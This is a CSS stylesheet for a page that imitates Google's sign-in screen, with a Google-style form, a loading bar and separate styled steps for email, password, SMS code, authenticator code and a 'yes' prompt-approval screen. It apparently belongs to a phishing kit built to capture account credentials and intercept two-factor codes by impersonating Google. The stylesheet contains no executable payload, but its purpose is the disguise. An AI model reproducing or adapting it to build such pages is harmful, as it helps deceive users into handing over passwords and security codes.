.google {
  font-family: Roboto, sans-serif;
  padding: 48px;
  min-height: 100vh;
  height: 100%;
  width: 100%;
  background: #f0f4f9;
  display: flex;
  align-items: center;
  justify-content: center;
  line-height: 1.42;
}
.google .google-number {
  text-align: center;
  margin: 15px 0;
}
.google .google-number h2 {
  font-size: 16px;
  font-weight: 500;
  margin-bottom: 5px;
}
.google .google-number span {
  display: inline-flex;
  justify-content: center;
  align-items: center;
  height: 45px;
  width: 45px;
  border-radius: 50%;
  font-size: 22px;
  border: 1px solid #ccc;
}
.google.has-error .google-input {
  margin-bottom: 30px;
}
.google.has-error .google-error {
  display: block;
  color: #b3261e;
}
.google.has-error input {
  outline-color: #b3261e;
}
.google.has-error input:not(:-moz-placeholder-shown) + span {
  color: #b3261e;
}
.google.has-error input:not(:placeholder-shown) + span {
  color: #b3261e;
}
.google.has-error input:focus {
  outline-color: #b3261e;
}
.google.has-error input:focus + span {
  color: #b3261e;
}
.google.loading .loading-overlay {
  display: block;
}
.google.loading .google-form::before {
  display: block;
}
.google .loading-overlay {
  position: fixed;
  left: 0;
  top: 0;
  background-color: #fff;
  opacity: 0.5;
  width: 100%;
  height: 100vh;
  z-index: 99;
}
.google-content {
  width: 100%;
  display: flex;
  align-items: center;
  flex-direction: column;
  max-width: 1040px;
}
.google-footer {
  margin-top: 16px;
  display: flex;
  justify-content: flex-end;
  gap: 30px;
  font-size: 12px;
  width: 100%;
  color: #1f1f1f;
  padding-right: 20px;
}

@keyframes loadingBar {
  0% {
    left: -40%;
  }
  100% {
    left: 100%;
  }
}
.google-form {
  background-color: #fff;
  padding: 108px 36px 36px;
  display: grid;
  justify-content: space-between;
  grid-template-columns: 1fr 1fr;
  border-radius: 28px;
  position: relative;
  width: 100%;
  overflow: hidden;
}
.google-form::before {
  content: "";
  width: 40%;
  display: none;
  height: 5px;
  left: 0;
  top: 0;
  background: #0b57d0;
  position: absolute;
  animation: loadingBar 1.5s linear infinite;
}
.google-form .logo {
  position: absolute;
  width: 40px;
  height: 40px;
  top: 35px;
  left: 36px;
}
.google-form .buttons {
  grid-column: 1/3;
  display: flex;
  justify-content: flex-end;
  margin-top: 30px;
  align-items: center;
  gap: 30px;
}
.google-form .buttons button {
  background: #0b57d0;
  color: #fff;
  height: 40px;
  padding: 0 24px;
  border-radius: 20px;
  border: none;
  font-size: 14px;
  font-weight: 600;
}
.google-form a {
  color: #0b57d0;
  font-weight: 500;
  font-size: 14px;
}
.google-form .info {
  color: #1f1f1f;
  padding-right: 20px;
}
.google-form .info h2 {
  font-size: 30px;
  font-weight: 400;
}
.google-form .info p {
  margin-top: 16px;
}
.google-form .info .google-user {
  border-radius: 16px;
  border: 1px solid #747775;
  padding: 0 15px;
  display: inline-flex;
  font-size: 14px;
  font-weight: 500;
  align-items: center;
  justify-content: center;
  height: 28px;
  cursor: pointer;
  margin-top: 16px;
}
.google-form .info .google-user:hover {
  background-color: #ededed;
}
.google-form .data p {
  font-size: 14px;
}
.google-form .data h3 {
  font-size: 20px;
  margin-bottom: 10px;
  font-weight: 400;
}
.google-form .data img {
  max-width: 100%;
  height: 300px;
}
.google-form > * {
  flex: 1;
}
.google-form[data-step=google-email] .info p {
  margin-top: 10px;
}
.google-form[data-step=google-email] .data > a {
  margin-top: 10px;
  display: block;
}
.google-form[data-step=google-email] .data p {
  font-size: 14px;
  margin-top: 40px;
}
.google-form[data-step=google-password] .google-input {
  margin-top: 40px;
}
.google-form[data-step=google-password] .buttons {
  margin-top: 60px;
}
.google-form[data-step=google-sms-code] .data p, .google-form[data-step=google-2fa-code] .data p {
  margin-bottom: 16px;
}
.google-form[data-step=google-sms-code] .buttons, .google-form[data-step=google-2fa-code] .buttons {
  margin-top: 60px;
}
.google-form[data-step=google-yes] .data img {
  margin-top: 40px;
  margin-bottom: 30px;
}
.google-form[data-step=google-yes] .buttons {
  margin-top: 80px;
}
.google-form[data-step=google-yes] .google-error {
  margin-top: 10px;
}

.google-input {
  width: 100%;
  position: relative;
  display: block;
  padding-top: 10px;
}
.google-input span {
  position: absolute;
  left: 14px;
  background: #fff;
  padding: 0 5px;
  top: calc(50% + 5px);
  transform: translateY(-50%);
  transition: all 0.1s ease-in-out;
  font-size: 16px;
}
.google-input input {
  width: 100%;
  padding: 12px 14px;
  outline: 1px solid rgb(118, 118, 118);
  border-radius: 4px;
  height: 54px;
  font-size: 16px;
  border: none;
}
.google-input input:focus {
  outline-width: 2px;
  outline-color: #0b57d0;
}
.google-input input:focus + span {
  color: #0b57d0;
}
.google-input input:not(:-moz-placeholder-shown) + span {
  top: 10px;
  font-size: 12px;
}
.google-input input:focus + span, .google-input input:not(:placeholder-shown) + span {
  top: 10px;
  font-size: 12px;
}
.google-input small {
  display: none;
  color: #b3261e;
  position: absolute;
  margin-top: 5px;
}

@media (max-width: 1015px) {
  .google-form {
    display: flex;
    flex-direction: column;
  }
  .google-form .info {
    margin-bottom: 32px;
    padding: 0;
  }
}
@media (max-width: 600px) {
  .google {
    padding: 0;
    background: #fff;
    align-items: flex-start;
    justify-content: flex-start;
  }
  .google-content {
    min-height: 100vh;
  }
  .google-footer {
    margin-top: auto;
    padding: 10px 20px;
  }
  .google-form {
    width: 100%;
    border-radius: 0;
    justify-content: flex-start;
  }
  .google-form > * {
    flex: none;
  }
  .google-form .data img {
    height: 150px;
  }
}